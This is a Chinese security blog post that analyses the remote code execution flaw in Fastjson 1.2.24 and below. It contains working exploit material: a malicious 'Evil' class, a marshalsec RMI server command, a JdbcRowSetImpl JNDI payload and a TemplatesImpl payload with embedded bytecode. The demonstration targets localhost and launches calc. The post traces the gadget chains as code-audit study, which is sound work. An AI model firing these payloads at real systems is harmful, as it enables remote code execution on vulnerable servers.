【Java代码审计】Fastjson1.2.24漏洞分析

已于 2024-02-21 22:13:57 修改
阅读量342 收藏 1
点赞数
分类专栏: 代码审计 文章标签: java json web安全 网络安全 网络攻击模型
于 2023-04-03 22:31:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48201589/article/details/129941463
版权

Fastjson是由阿里巴巴研发的一个java库,用来实现Java对象转换JSON格式以及JSON字符串转换为对象。

在Fastjson<=1.2.24以前存在远程代码执行漏洞。

Fastjson漏洞分析

启用一个maven项目,直接在pom.xml导入以下内容

<dependencies>
    <dependency>
        <groupId>com.alibaba</groupId>
        <artifactId>fastjson</artifactId>
        <version>1.2.23</version>
    </dependency>
</dependencies>

导入JSON库

import com.alibaba.fastjson.JSON

fastjson有两种常见的处理JSON方式:

  • JSON.toJSONString()

  • JSON.parseObject()

分别用来将对象转换为JSON字符串以及JSON字符串转换为对象。

先定义一个类User,用来作为JSON对象。

public class User {
    private int age;
    private String name;
    public int getAge() {
        System.out.println("调用了getAge()");
        return age;
    }
    public void setAge(int age) {
        this.age = age;
        System.out.println("调用了setAge()");
    }
​
    public String getName() {
        System.out.println("调用了getName()");
        return name;
    }
​
    public void setName(String name) {
        this.name = name;
        System.out.println("调用了setName()");
    }
}

我们使用JSON.toJSONString来JSON序列化我们的类user。

import com.alibaba.fastjson.JSON;
​
public class Test {
    public static void main(String[] args) {
        User user = new User();
        user.setAge(18);
        user.setName("Tom");
        System.out.println("-----------JSON------------------");
        String json = JSON.toJSONString(user);
        System.out.println(json);
    }
}

可以看到运行结果为:

调用了setAge()
调用了setName()
-----------JSON------------------
调用了getAge()
调用了getName()
{"age":18,"name":"Tom"}

我们再创建一个类,用来将JSON序列化的内容转换为JAVA对象。

import com.alibaba.fastjson.JSON;
​
public class JsonToObj {
    public static void main(String[] args) {
        String str = "{\"age\":18,\"name\":\"Tom\"}";
        System.out.println(JSON.parseObject(str,User.class));
    }
}

可以看到运行结果为:

调用了setAge()
调用了setName()
User@28c97a5

不难发现,JSON序列化对象时调用了getAge()和getName(),而在反序列化时调用了setAge()和setName()。且在反序列化时调用的JSON.parseObject(str,User.class),指定所属的类还可以通过指定@type的方式来定位类。

当我们利用JSON在反序列化时调用并覆盖恶意的类的构造方法以及属性相关的set方式时,就能够达到RCE的目的,且JSON.parseObject(“{"@type":"

User","name":"Tom","age":18}”,Feature.SupportNonPublicField) 能够为private成员赋值。

JdbcRowSetImpl

com.sun.rowset.JdbcRowSetImpl

使用JNDI注入来实现RCE。

编译这个类,放到我们启用的RMI服务器的目录下,确保我们能够访问到它。

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
​
public class Evil extends AbstractTranslet{
    static {
        System.err.println("Pwned");
        try {
            String[] cmd = {"calc"};
            java.lang.Runtime.getRuntime().exec(cmd).waitFor();
        } catch ( Exception e ) {
            e.printStackTrace();
        }
    }
​
    @Override
    public void transform(DOM arg0, SerializationHandler[] arg1) throws TransletException {
        // anything
    }
​
    @Override
    public void transform(DOM arg0, DTMAxisIterator arg1, SerializationHandler arg2) throws TransletException {
        // anything
    }
}

启动RMI服务器

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://127.0.0.1/#Evil" 9999

构造恶意的Payload

import com.alibaba.fastjson.JSON;
​
public class JsonToObj {
    public static void main(String[] args) {
        String str = "{\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://127.0.0.1:9999/#Evil\",\"autoCommit\":true}}";
        System.out.println(JSON.parseObject(str));
    }
}

成功命令执行

原理:

将恶意的值(接下来我们构造的dataSourceName)输入到setDataSourceName(String name)

public void setDataSourceName(String name) throws SQLException {
​
        if (name == null) {
            dataSource = null;
        } else if (name.equals("")) {
           throw new SQLException("DataSource name cannot be empty string");
        } else {
           dataSource = name;
        }
​
        URL = null;
    }

会运行setAutoCommit(),其中的connect()里面,就是我们这个反序列化漏洞的核心函数lookup()。

public void setAutoCommit(boolean var1) throws SQLException {
        if (this.conn != null) {
            this.conn.setAutoCommit(var1);
        } else {
            this.conn = this.connect();
            this.conn.setAutoCommit(var1);
        }
​
    }

connect()方法中有典型的JNDI的Lookup方法调用,且参数为我们上传的参数dataSourceName。

protected Connection connect() throws SQLException {
        if (this.conn != null) {
            return this.conn;
        } else if (this.getDataSourceName() != null) {
            try {
                InitialContext var1 = new InitialContext();
                DataSource var2 = (DataSource)var1.lookup(this.getDataSourceName());
                return this.getUsername() != null && !this.getUsername().equals("") ? var2.getConnection(this.getUsername(), this.getPassword()) : var2.getConnection();
            } catch (NamingException var3) {
                throw new SQLException(this.resBundle.handleGetObject("jdbcrowsetimpl.connect").toString());
            }
        } else {
            return this.getUrl() != null ? DriverManager.getConnection(this.getUrl(), this.getUsername(), this.getPassword()) : null;
        }
    }

TemplatesImpl

TemplatesImplcom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl,这个类的利用条件较为苛刻,必须要开启Feature.SupportNonPublicField,便可以不利用setter方法,成功赋值。

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
​
public class JsonToObj {
    public static void main(String[] args) {
        String str = "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_bytecodes\":[\"yv66vgAAADQAJAoAAwAPBwARBwASAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAR0ZXN0AQAMSW5uZXJDbGFzc2VzAQAiTGNvbS9oZWxsby9kZW1vL2pzb24vSkRLN3UyMSR0ZXN0OwEAClNvdXJjZUZpbGUBAAxKREs3dTIxLmphdmEMAAQABQcAEwEAIGNvbS9oZWxsby9kZW1vL2pzb24vSkRLN3UyMSR0ZXN0AQAQamF2YS9sYW5nL09iamVjdAEAG2NvbS9oZWxsby9kZW1vL2pzb24vSkRLN3UyMQEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHABUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAXABgKABYAGQEABGNhbGMIABsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAdAB4KABYAHwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHACEKACIADwAhAAIAIgAAAAAAAgABAAQABQABAAYAAAAvAAEAAQAAAAUqtwAjsQAAAAIABwAAAAYAAQAAACoACAAAAAwAAQAAAAUACQAMAAAACAAUAAUAAQAGAAAAFgACAAAAAAAKuAAaEhy2ACBXsQAAAAAAAgANAAAAAgAOAAsAAAAKAAEAAgAQAAoACQ==\"],'_name':'exp','_tfactory':{ },\"_outputProperties\":{ }}";
        System.out.println(JSON.parseObject(str, Feature.SupportNonPublicField));
    }
}

成功命令执行

原理:

调用了_outputProperties的getter方法(getOutputProperties)

跟进newTransformer()

跟进getTransletInstancew()

name不为空且 _class为空时,会进入defineTransletClasses()

defineTransletClasses()中,要满足tfactory属性不为空,否则会造成空指针异常,且后面将二维数组bytecode属性转化为Class对象,同时存入一维数组_class属性中,同时有一个细节就是我们构造的恶意类父类要为com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet,不然这个索引不会更新当前位置

然后回到getTransletInstance()方法

这里根据_class属性以及当前索引获取当前Class对象,并拿到无参构造器进行实例化,可以将恶意代码放在无参构造函数或者静态代码块中,这样实例化时就会触发命令执行等操作从而RCE

Hello_Brian
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Java代码审计Fastjson反序列化漏洞详解
悦分享
09-16 2137
FastJson 是一个由阿里巴巴研发的java库,FastJson是开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到Java Bean。“自2017年3月15日,fastjson官方主动爆出其在1.2.24及之前版本存在远程代码执行高危安全漏洞以来,各种新型绕过姿势层出不穷。漏洞被利用本质找到一条有效的攻击链,攻击链的末端就是有代码执行能力的类,来达到我们想做的事情,一般都是用来RCE(远程命令执行)。
fastjson1.2.24反序列化RCE
06-24
例如,可以创建一个`pom.xml`文件,用于构建包含Fastjson 1.2.24版本的项目,并编写Java代码来模拟反序列化过程: ```xml <!-- pom.xml --> <groupId>com.alibaba</groupId> <artifactId>fastjson ...
Java代码审计——Fastjson1.2.24反序列化漏洞
王嘟嘟的博客
12-03 1961
0x00 前言 Fastjson是一个老生常谈的东西,但是之前整理的东西都比较简单和凌乱所以只能开篇重新进行整理,方便复习和学习。 0x01 环境 idea使用maven创建一个新的工程 1.修改pom 这里添加1.2.24版本的fastjson库 <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w
fastjson 1.2.24 反序列化导致任意命令执行漏洞
weixin_62117955的博客
06-03 1028
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。FastJson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。注:该漏洞可以反弹shell,方法与命令执行一样,构造的payload也与命令执行的一样,这里就不展示了。应用程序,用于接收和处理客户端的远程方法调用请求,实现分布式系统中的远程通信和方法调用。
FastJson1.2.24反序列化漏洞代码分析
BigBirdSecurity的博客
07-24 985
FastJson漏洞代码分析,为了对漏洞理解更深入,也是为以后挖掘通用漏洞作铺垫,提升代码审计能力,积累更多的知识。简单分析一下fastjson反序列化漏洞的成因、调用过程和触发点。httpshttpshttpshttpshttpshttpshttpshttpshttpshttpshttpshttpshttpshttps。.........
Java代码审计——Fastjson1.2.25反序列化漏洞
王嘟嘟的博客
02-28 3925
0x00 前言 反序列化总纲 1.2.24可参考:1.2.24fastjson1.2.24fastjson之后,对该漏洞进行了修复,从而有了Fastjson1.2.25反序列化漏洞 这里分为两类,一类是主动开启了AutoType,还有一类是未开启AutoType 0x01 1.2.25防护 我们这里以1.2.24的payload进行测试: String payload="{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"
Java代码审计——Fastjson1.2.42反序列化漏洞
王嘟嘟的博客
02-28 3319
0x00 前言 反序列化总纲 1.2.24可参考:1.2.24fastjson 1.2.25-1.2.41 可参考:1.2.25 这篇就单纯划水~ 0x01 正文 长话短说,此漏洞需要开启AutoType 在check的时候会对类进行处理 处理之后就会删除L和; 那么payload: String payload="{\"@type\":\"LLcom.sun.rowset.JdbcRowSetImpl;;\",\"dataSourceName\":\"ldap://localhost:9999/a\"
java代码审计fastjson反序列化漏洞
CheatMyself的博客
05-30 941
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。该产品主要提供了两个接口,JSON.toJSONString和JSON.parseObject/JSON.parse分别实现序列化和反序列化。
Java代码审计——Fastjson1.2.60反序列化漏洞
王嘟嘟的博客
03-01 5685
0x00 前言 反序列化总纲 1.2.24可参考:1.2.24fastjson 1.2.25-1.2.41 可参考:1.2.25 1.2.25-1.2.42 可参考:1.2.42 1.2.43可参考1.2.43 1.2.60的利用方式,实际上就是绕过了fastjson的黑名单,前提还是要autotype开启,并且存在相对应的库。 0x01 环境 maven中加入以下,然后刷新即可。 <dependency> <groupId>commons-c
fastjson 1.2.24-1.2.67 漏洞分析,附Poc分析
LTianHang的博客
05-28 1126
fastjson 1.2.24版本与1.2.67版本 之间的版本漏洞分析,和已公开的Poc分析fastjson 1.2.68以上版本的漏洞分析,会开一篇新的文章进行整理
Java安全篇-Fastjson漏洞
m0_63138919的博客
03-28 2770
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误
fastjson1.2.24含源码
02-04
Fastjson 1.2.24版本是其发展过程中的一个重要里程碑,该版本包含了完整的源码,允许开发者深入研究其内部机制,优化自己的代码,或对库进行自定义扩展。 1. **Fastjson简介** Fastjson的核心功能是将Java对象转换...
fastjson-1.2.24
04-24
Fastjson 1.2.24版本中,针对之前的安全漏洞进行了修复,增强了其安全性。开发者应定期更新Fastjson以确保应用的安全性。 7. 性能优化 Fastjson在设计时充分考虑了性能,如使用直接操作字节码的技术来提升速度,...
fastjson-1.2.24.jar
02-24
java运行依赖jar包
java springboot 集成 阿里通义千问
qq_25987725的博客
07-25 392
一、在阿里云https://www.aliyun.com官网直接搜索“通义千问”,点击“开通DashScope”进行服务激活。四、在config目录添加配置 TongYiAiConfiguration.java。三、在yml中配置中配置key。二、加入Maven依赖。
使用hutool工具判断字符串是否全部是字母(包括大小写),java判断字符串是否全部是字母(包括大小写)
最新发布
qq_43700885的博客
07-29 444
1.导入hutool的maven依赖。2.复制一下代码执行。
java判断邮箱地址是否正确,使用hutool工具判断邮箱地址是否正确
qq_43700885的博客
07-29 243
1.导入hutool的maven依赖。2.直接复制一下代码运行。
fastjson1.2.24漏洞
09-08
Fastjson 1.2.24是一个存在远程代码执行漏洞的版本。该漏洞利用了Fastjson在处理json对象时未对@type字段进行完全的安全性验证的问题。攻击者可以通过传入危险类并调用危险类连接远程rmi主机,从而执行恶意代码。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hello_Brian

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值